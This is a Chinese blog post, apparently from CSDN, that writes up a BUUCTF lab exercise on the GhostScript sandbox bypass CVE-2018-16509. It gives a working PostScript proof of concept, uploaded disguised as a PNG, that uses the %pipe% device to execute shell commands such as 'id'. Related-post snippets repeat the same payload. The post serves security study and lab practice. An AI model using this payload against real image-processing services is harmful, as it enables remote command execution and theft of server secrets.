Buuctf [GhostScript]CVE-2018-16509

最新推荐文章于 2024-07-29 10:13:19 发布

土豆儿258563

最新推荐文章于 2024-07-29 10:13:19 发布

阅读量151

点赞数

文章标签：安全

本文链接：https://blog.youkuaiyun.com/ch258563/article/details/130950516

版权

文章揭示了一个影响GhostScript9.24之前的版本的安全漏洞，该漏洞可以通过上传特制的PNG文件触发，导致代码执行。依赖GhostScript的库，如ImageMagick和PythonPIL，可能受到此漏洞的影响。攻击者可以利用这个漏洞来读取系统环境变量并获取敏感信息。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞描述

GhostScript 被许多图片处理库所使用，如 ImageMagick、Python PIL 等，默认情况下这些库会根据图片的内容将其分发给不同的处理方法，其中就包括 GhostScript。

漏洞影响

Ghostscript 9.24之前版本

漏洞复现

直接上传一个png打poc

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops

打印环境变量，获得flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

土豆儿258563

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509

qq_51577576的博客

12-07

855

[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509 CVE-2018-16509是由于GhostScript在处理/invalidaccess异常时，程序没有正确的检测restoration of privilege（权限恢复），导致攻击者可通过提交特制的PostScript利用该漏洞执行代码。

利用Vulnhub复现漏洞 - GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509）

JiangBuLiu的博客

07-08

2104

GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509）Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC上传POC Vulnhub官方复现教程 https://vulhub.org/#/environments/ghostscript/CVE-2018-16509/ 漏洞原理 GhostScript 被许多图片处理库所使用，如 ImageMagick、Pyt...

参与评论您还未登录，请先登录后发表或查看评论

GhostScript 沙箱绕过（命令执行）CVE-2018-16509/6116/19475/ 漏洞

weixin_51387754的博客

11-24

1107

标题 browse——ghost.png 提交 submit Query

GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509）

EC_Carrot的博客

06-06

250

漏洞背景 2018年8 月 21 号，Tavis Ormandy 通过公开邮件列表，再次指出 GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞。影响范围 Artifex Ghostscript 9.24之前版本漏洞复现先下载Poc图片，源码： %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stoppe

buuctf [GhostScript]CVE-2018-16509

qq_1873822的博客

03-31

671

漏洞描述 GhostScript 被许多图片处理库所使用，如 ImageMagick、Python PIL 等，默认情况下这些库会根据图片的内容将其分发给不同的处理方法，其中就包括 GhostScript。 https://blog.youkuaiyun.com/JiangBuLiu/article/details/95061202 漏洞影响 Ghostscript 9.24之前版本漏洞复现直接上传一个png打poc %!PS userdict /setpagedevice undef save legal {

[春秋云镜]CVE-2018-16509

niubi707的博客

12-02

5452

春秋云镜CVE-2018-16509GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞。 Python 中处理图片的模块 PIL（Pillow），因为其内部调用了 GhostScript 而受到 CVE-2018-16509的影响

利用Vulnhub复现漏洞 - GhostScript 沙箱绕过（命令执行）漏洞（CVE-2019-6116）

JiangBuLiu的博客

07-08

1925

GhostScript 沙箱绕过（命令执行）漏洞（CVE-2019-6116）Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC上传POC文件检测是否成功 Vulnhub官方复现教程 https://vulhub.org/#/environments/ghostscript/CVE-2019-6116/ 漏洞原理 GhostScript 被许多图片处理库所使用，如 ImageMagi...

vulhub中ghostscript的cve-2018-16509漏洞复现记录

xeeyuuuu的博客

04-08

658

该漏洞在kali环境中复现，首先进入CVE-2018-16509目录，开启docker-compose环境开启漏洞环境命令： docker-compose build docker-compose up -d 参考：https://blog.youkuaiyun.com/qq_41901122/article/details/107978142 访问该地址，可以看到有文件上传的途径端口8080 poc：poc.png poc地址：https://github.com/vulhub/vulhub/blob

GhostScript沙箱绕过(命令执行漏洞)CVE-2018-16509

她叫常玉莹

07-27

1064

2018年8 月 21 号，Tavis Ormandy 通过公开邮件列表，再次指出 GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞。 GhostScript 被许多图片处理库所使用，如 ImageMagick、Python PIL 等，默认情况下这些库会根据图片的内容将其分发给不同的处理方法，其中就包括 GhostScript。访问http://192.168.0.104:8080上传poc.png 执行id > /tmp/succ

GhostScript 沙箱绕过（CVE-2018-16509）

最新发布

qq_62056583的博客

07-29

361

① 漏洞成因，在2018年Tavis Ormandy 通过公开邮件列表，再次指出 GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞。即用户可以通过图片隐写的方式构造payload绕过检测构造命令执行。② 因为GhostScript被许多图片处理库使用，默认情况是GhostScript通过传入图片内容将其分发到不同的处理算法中当然也包括GhostScript。

Python 渗透测试：GhostScript 沙箱绕过.（CVE-2018-16509）

网络安全领域___专研者.

05-20

939

GhostScript 沙箱是一种安全机制,用于在受控环境中运行 GhostScript 解释器,以防止恶意代码的执行。GhostScript 是一个广泛使用的 PDF 和 PostScript 解释器,通常用于在服务器上处理和渲染这些文件格式。但是,GhostScript 也可能存在安全漏洞,攻击者可以利用这些漏洞来执行任意代码。GhostScript 沙箱就是为了解决这个问题而设计的。它将 GhostScript 解释器置于一个受限的执行环境中,限制其访问系统资源的能力。这样可以防止恶意代码在 Ghos

【漏洞靶场】--GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509）

hello word的博客

01-06

2288

环境 exp 把如下代码保存为一个png文件。 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%ls / > /tmp/success && cat /tmp/success) currentdevice putdeviceprops 上传，执行l

CVE-2018-16509 GhostScript 沙箱绕过（命令执行）漏洞

m0_65150886的博客

12-29

512

GhostScript 被许多图片处理库所使用，如 ImageMagick、Python PIL 等，默认情况下这些库会根据图片的内容将其分发给不同的处理方法，其中就包括 GhostScript。8 月 21 号，Tavis Ormandy 通过公开邮件列表，再次指出 GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞。2.上传poc.png，将执行命令id > /tmp/success && cat /tmp/success。

漏洞复现笔记（CVE-2018-16509）

weixin_72760965的博客

06-14

276

Ghostscript 是一套基于 Adobe、PostScript 及可移植文档格式（PDF）的页面描述语言等而编译成的免费软件。以Postscript和PDF阅览器使用的栅格化影像处理器RIP引擎，GhostScript 被许多图片处理库所使用。在文件上传过程中，有可能会用GhostScript来处理图片。Ghostscript 可以查看及打印 PS、EPS、PDF 文件，支持 PS 的绘图程序一般都很大。（将id这个命令写入到success这个文件中，并且查看这个文件）这里使用的是靶场自带的poc。

复现vulhub中ghostscript的CVE-2018-16509漏洞

YX_zjp的博客

03-03

432

使用腾讯云轻量服务器安装vulhub。系统：ubuntu20.04。可以看到相关端口是8080。done表示环境已开启。

GhostScript 沙箱绕过（命令执行）漏洞 CVE-2018-16509 漏洞复现

ADummy的博客

02-24

360

GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509） by ADummy 0x00利用路线构造poc png图片—>上传图片—>有回显命令执行 0x01漏洞介绍 8 月 21 号，Tavis Ormandy 通过公开邮件列表，再次指出 GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞： http://seclists.org/oss-sec/2018/q3/142 https://b

GhostScript 沙箱绕过命令执行漏洞

m0_63241485的博客

08-26

1301

当dorestore退出时，LockFilePermissions的值被设置为falsea = blob;随后使用.setuserparams方法还原LockFilePermissionsa = blob;但是，在restore之后，.setuserparams方法执行之前，可能会抛出StackOverflowError栈溢出错误，不会重置“LockFilePermissions”。从而导致绕过-dSAFER。...

Ghostscript8.51-w32最新版本发布

Ghostscript是一种开源的、功能强大的软件，主要用于处理PostScript（PS）和PDF文件格式。PostScript是由Adobe公司开发的一种页面描述语言，广泛应用于电子及打印出版领域。在计算机中，Ghostscript常用于阅读、打印...